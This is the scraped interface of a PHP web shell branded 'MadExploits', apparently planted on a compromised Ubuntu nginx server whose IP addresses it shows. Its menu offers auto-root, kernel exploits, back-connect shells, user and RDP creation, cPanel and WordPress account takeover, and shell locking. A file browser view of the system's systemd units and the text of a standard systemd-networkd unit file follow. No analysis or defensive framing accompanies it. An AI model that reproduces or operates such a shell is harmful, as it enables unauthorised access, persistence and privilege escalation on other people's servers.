Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.189
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
systemd /
system /
multi-user.target.wants /
[ HOME SHELL ]
Name
Size
Permission
Action
clamav-daemon.service
496
B
-rw-r--r--
clamav-freshclam.service
390
B
-rw-r--r--
console-setup.service
312
B
-rw-r--r--
cron.service
319
B
-rw-r--r--
dmesg.service
409
B
-rw-r--r--
droplet-agent.service
358
B
-rw-r--r--
e2scrub_reap.service
553
B
-rw-r--r--
grub-common.service
583
B
-rw-r--r--
grub-initrd-fallback.service
408
B
-rw-r--r--
irqbalance.service
505
B
-rw-r--r--
lxd-agent.service
476
B
-rw-r--r--
mysql.service
529
B
-rw-r--r--
networkd-dispatcher.service
258
B
-rw-r--r--
nginx.service
1.01
KB
-rw-r--r--
open-vm-tools.service
489
B
-rw-r--r--
php8.1-fpm.service
542
B
-rw-r--r--
pollinate.service
404
B
-rw-r--r--
postfix.service
282
B
-rw-r--r--
remote-fs.target
530
B
-rw-r--r--
rsyslog.service
469
B
-rw-r--r--
secureboot-db.service
735
B
-rw-r--r--
snap-certbot-4965.mount
329
B
-rw-r--r--
snap-certbot-5057.mount
329
B
-rw-r--r--
snap-core-17212.mount
323
B
-rw-r--r--
snap-core-17247.mount
323
B
-rw-r--r--
snap-core20-2599.mount
326
B
-rw-r--r--
snap-core20-2669.mount
326
B
-rw-r--r--
snap-core24-1196.mount
326
B
-rw-r--r--
snap-core24-1225.mount
326
B
-rw-r--r--
snap-lxd-31333.mount
320
B
-rw-r--r--
snap-lxd-35819.mount
320
B
-rw-r--r--
snap-snapd-25202.mount
326
B
-rw-r--r--
snap-snapd-25577.mount
326
B
-rw-r--r--
snap.lxd.activate.service
467
B
-rw-r--r--
snapd.apparmor.service
1.27
KB
-rw-r--r--
snapd.autoimport.service
487
B
-rw-r--r--
snapd.core-fixup.service
369
B
-rw-r--r--
snapd.recovery-chooser-trigger...
550
B
-rw-r--r--
snapd.seeded.service
308
B
-rw-r--r--
snapd.service
750
B
-rw-r--r--
ssh.service
538
B
-rw-r--r--
systemd-networkd.service
2.27
KB
-rw-r--r--
systemd-resolved.service
1.74
KB
-rw-r--r--
ua-reboot-cmds.service
830
B
-rw-r--r--
ubuntu-advantage.service
1.53
KB
-rw-r--r--
ufw.service
333
B
-rw-r--r--
unattended-upgrades.service
377
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : systemd-networkd.service
# SPDX-License-Identifier: LGPL-2.1-or-later # # This file is part of systemd. # # systemd is free software; you can redistribute it and/or modify it # under the terms of the GNU Lesser General Public License as published by # the Free Software Foundation; either version 2.1 of the License, or # (at your option) any later version. [Unit] Description=Network Configuration Documentation=man:systemd-networkd.service(8) ConditionCapability=CAP_NET_ADMIN DefaultDependencies=no # systemd-udevd.service can be dropped once tuntap is moved to netlink After=systemd-networkd.socket systemd-udevd.service network-pre.target systemd-sysusers.service systemd-sysctl.service Before=network.target multi-user.target shutdown.target Conflicts=shutdown.target Wants=systemd-networkd.socket network.target [Service] AmbientCapabilities=CAP_NET_ADMIN CAP_NET_BIND_SERVICE CAP_NET_BROADCAST CAP_NET_RAW BusName=org.freedesktop.network1 CapabilityBoundingSet=CAP_NET_ADMIN CAP_NET_BIND_SERVICE CAP_NET_BROADCAST CAP_NET_RAW DeviceAllow=char-* rw ExecStart=!!/lib/systemd/systemd-networkd ExecReload=networkctl reload LockPersonality=yes MemoryDenyWriteExecute=yes NoNewPrivileges=yes ProtectProc=invisible ProtectClock=yes ProtectControlGroups=yes ProtectHome=yes ProtectKernelLogs=yes ProtectKernelModules=yes ProtectSystem=strict Restart=on-failure RestartKillSignal=SIGUSR2 RestartSec=0 RestrictAddressFamilies=AF_UNIX AF_NETLINK AF_INET AF_INET6 AF_PACKET AF_ALG RestrictNamespaces=yes RestrictRealtime=yes RestrictSUIDSGID=yes RuntimeDirectory=systemd/netif RuntimeDirectoryPreserve=yes SystemCallArchitectures=native SystemCallErrorNumber=EPERM SystemCallFilter=@system-service Type=notify User=systemd-network WatchdogSec=3min [Install] WantedBy=multi-user.target Also=systemd-networkd.socket Alias=dbus-org.freedesktop.network1.service # The output from this generator is used by udevd and networkd. Enable it by # default when enabling systemd-networkd.service. Also=systemd-network-generator.service # We want to enable systemd-networkd-wait-online.service whenever this service # is enabled. systemd-networkd-wait-online.service has # WantedBy=network-online.target, so enabling it only has an effect if # network-online.target itself is enabled or pulled in by some other unit. Also=systemd-networkd-wait-online.service
Close